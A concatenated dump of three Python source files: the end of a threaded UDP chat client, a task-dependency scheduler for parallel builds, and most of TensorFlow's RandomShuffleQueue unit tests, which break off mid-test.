client.sendto(mod_data_to_send, (hostL, port))
f.close()
print(f'File {file_name} is send')
else:
message_send = f'<{local_tz}>{name}->{message}'.encode(code_table)
message_len_send = f'{len(message_send):<{length_of_message}}'.encode(code_table)
client.sendto(message_len_send + message_send, (hostL, port))
receive_thread = threading.Thread(target=receive_message)
receive_thread.start()
write_thread = threading.Thread(target=send_message)
write_thread.start()
|
tasks.py
|
from ctypes import c_char_p
import logging
import traceback
from multiprocessing import Semaphore, Condition, Lock, Value, Pipe, Process
class Task:
class State:
def __init__(self):
pass
NEW = 'NEW'
RUNNING = 'RUNNING'
DONE = 'DONE'
FAILED = 'FAILED'
def parse_state(self, string):
if string == Task.State.NEW:
return Task.State.NEW
elif string == Task.State.RUNNING:
return Task.State.RUNNING
elif string == Task.State.DONE:
return Task.State.DONE
elif string == Task.State.FAILED:
return Task.State.FAILED
else:
raise AttributeError('Invalid state: %s', string)
def __init__(self, name):
self.name = name
self.dependencies = set()
self.state = Task.State.NEW
self.result_proxy = None
def __str__(self):
return self.name
def update(self):
if self.result_proxy is not None and self.result_proxy.value is not '':
logging.debug("Updating task %s to status %s", self.name, self.result_proxy.value)
self.state = self.parse_state(self.result_proxy.value)
self.result_proxy = None #reset to None to avoid 'RuntimeError: Synchronized objects should only be shared between processes through inheritance'
def has_resolved_dependencies(self):
"""Return True if all dependencies are in State.DONE"""
for dependency in self.dependencies:
if dependency.state != Task.State.DONE:
return False
return True
def is_new(self):
return self.state == Task.State.NEW
def dependencies_as_list(self):
"""Returns a list of dependency names."""
dependencies = []
for dependency in self.dependencies:
dependencies.append(dependency.name)
return dependencies
def dependencies_as_string(self):
"""Returns a comma separated list of dependency names."""
return ",".join(self.dependencies_as_list())
def ordered_dependencies(self):
ordered_dependencies = self._all_dependencies()
return ordered_dependencies
def _all_dependencies(self):
deps = []
unprocessed_deps = [self]
processed_deps = []
while unprocessed_deps:
dep = unprocessed_deps.pop()
if dep.dependencies and dep not in processed_deps and \
not set(dep.dependencies).issubset(set(processed_deps)):
unprocessed_deps += [dep] + list(dep.dependencies)
processed_deps.append(dep)
elif dep not in deps and dep is not self:
deps.append(dep)
return deps
def has_dependencies(self):
return len(self.dependencies) > 0
class Tasks:
def __init__(self):
self.tasks = {}
self.dirty = True
def get_task(self, name):
"""Get task by name or create it if it does not exists."""
if name in self.tasks.keys():
task = self.tasks[name]
else:
task = Task(name)
self.tasks[name] = task
return task
def add(self, task_name, dependency_names=set()):
task = self.get_task(task_name)
for dependency_name in dependency_names:
dependency = self.get_task(dependency_name)
task.dependencies.add(dependency)
self.dirty = True
def get_next(self):
"""Return next task from the stack that has all dependencies resolved.
Return None if there are no tasks with resolved dependencies or is there are no more tasks on stack.
Use `count` to check is there are still some task left on the stack.
raise ValueError if total ordering is not possible."""
self.update_tasks_status()
if self.dirty:
self.tsort()
self.dirty = False
for key, task in self.tasks.iteritems():
if task.is_new() and task.has_resolved_dependencies():
return task
return None
def count(self, state):
self.update_tasks_status()
count = 0
for key, task in self.tasks.iteritems():
if task.state == state:
count += 1
return count
def print_name(self, state):
list = ""
for key, task in self.tasks.iteritems():
if task.state == state:
if list != "":
list += " "+task.name
else:
list = task.name
return list
def update_tasks_status(self):
for key, task in self.tasks.iteritems():
task.update()
def are_dependencies_buildable(self, task):
for dependency in task.dependencies:
if dependency.state is Task.State.FAILED:
return False
else:
if not self.are_dependencies_buildable(dependency):
return False
return True
def count_buildable_tasks(self):
"""Count tasks that are new and have dependencies in non FAILED state."""
self.update_tasks_status()
buildable_tasks_count = 0
for key, task in self.tasks.iteritems():
if task.state is Task.State.NEW:
if self.are_dependencies_buildable(task):
buildable_tasks_count += 1
logging.debug("Buildable task: %s" % task.name )
else:
logging.debug("Task %s has broken dependencies." % task.name )
return buildable_tasks_count
def filter_tasks(self, task_names, keep_dependencies=False):
"""If filter is applied only tasks with given name and its dependencies (if keep_keep_dependencies=True) are kept in the list of tasks."""
new_tasks = {}
for task_name in task_names:
task = self.get_task(task_name)
if task not in new_tasks:
new_tasks[task.name] = task
if keep_dependencies:
for dependency in task.ordered_dependencies():
if dependency not in new_tasks:
new_tasks[dependency.name] = dependency
else:
#strip dependencies
task.dependencies = set()
self.tasks = new_tasks
#todo private
def tsort(self):
"""Given a partial ordering, return a totally ordered list.
part is a dict of partial orderings. Each value is a set,
which the key depends on.
The return value is a list of sets, each of which has only
dependencies on items in previous entries in the list.
raise ValueError if ordering is not possible (check for circular or missing dependencies)"""
task_dict = {}
for key, task in self.tasks.iteritems():
task_dict[task] = task.dependencies
# parts = parts.copy()
parts = task_dict.copy()
result = []
while True:
level = set([name for name, deps in parts.iteritems() if not deps])
if not level:
break
result.append(level)
parts = dict([(name, deps - level) for name, deps in parts.iteritems() if name not in level])
if parts:
raise ValueError('total ordering not possible (check for circular or missing dependencies)')
return result
def get_all(self):
return self.tasks
class TaskRunner:
"""TaskRunner is used for parallel execution of tasks (replacement for make)"""
def __init__(self, run_build):
self.run_build = run_build
def wait_tasks_to_complete(self, parallel_threads, process_finished_notify, semaphore):
logging.debug("Checking if there are running tasks.")
if semaphore.get_value() < parallel_threads: #is any task running
process_finished_notify.acquire()
logging.debug("Waiting for tasks to complete.")
process_finished_notify.wait()
logging.debug("Finished waiting tasks to complete.")
process_finished_notify.release()
def run(self, tasks, build_config, parallel_threads):
semaphore = Semaphore(parallel_threads)
process_finished_notify = Condition(Lock())
while tasks.count_buildable_tasks() > 0:
task = tasks.get_next()
if task is None:
self.wait_tasks_to_complete(parallel_threads, process_finished_notify, semaphore)
continue
semaphore.acquire()
task.state = Task.State.RUNNING
logging.debug("Starting task %s", task.name)
self.start_new_process(process_finished_notify, semaphore, self.process_job, task, build_config)
self.wait_tasks_to_complete(parallel_threads, process_finished_notify, semaphore)
if tasks.count(Task.State.FAILED) > 0:
logging.error('Some packages failed to build.')
logging.error(" %s", tasks.print_name(Task.State.FAILED))
return 1
if tasks.count(Task.State.RUNNING) > 0:
logging.error('Something went wrong, there are still some running tasks.')
return 1
if tasks.count(Task.State.NEW) > 0:
logging.error('Something went wrong, there are still unprocessed tasks.')
return 1
logging.info("Build completed successfully.")
return 0
def start_new_process(self, process_finished_notify, semaphore, target_method, task, build_config):
result_val = Value(c_char_p, '')
task_conn, task_conn_remote = Pipe()
config_conn, config_conn_remote = Pipe()
p = Process(target=target_method, args=[semaphore, process_finished_notify, task_conn_remote, config_conn_remote, result_val])
p.daemon = True
logging.debug("Sending task: %s", task.name)
task_conn.send(task)
config_conn.send(build_config)
task.result_proxy = result_val
p.start()
def process_job(self, semaphore, process_finished_notify, task_conn, config_conn, result_proxy):
task = task_conn.recv()
build_config = config_conn.recv()
try:
exit_status = self.run_build(task, build_config)
except Exception:
print(traceback.format_exc())
exit_status = 1
if exit_status != 0:
result_proxy.value = Task.State.FAILED
else:
result_proxy.value = Task.State.DONE
process_finished_notify.acquire()
semaphore.release()
process_finished_notify.notify()
process_finished_notify.release()
logging.debug("Task %s finished.", task.name)
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import re
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.test_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
def dequeue():
for _ in elems:
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
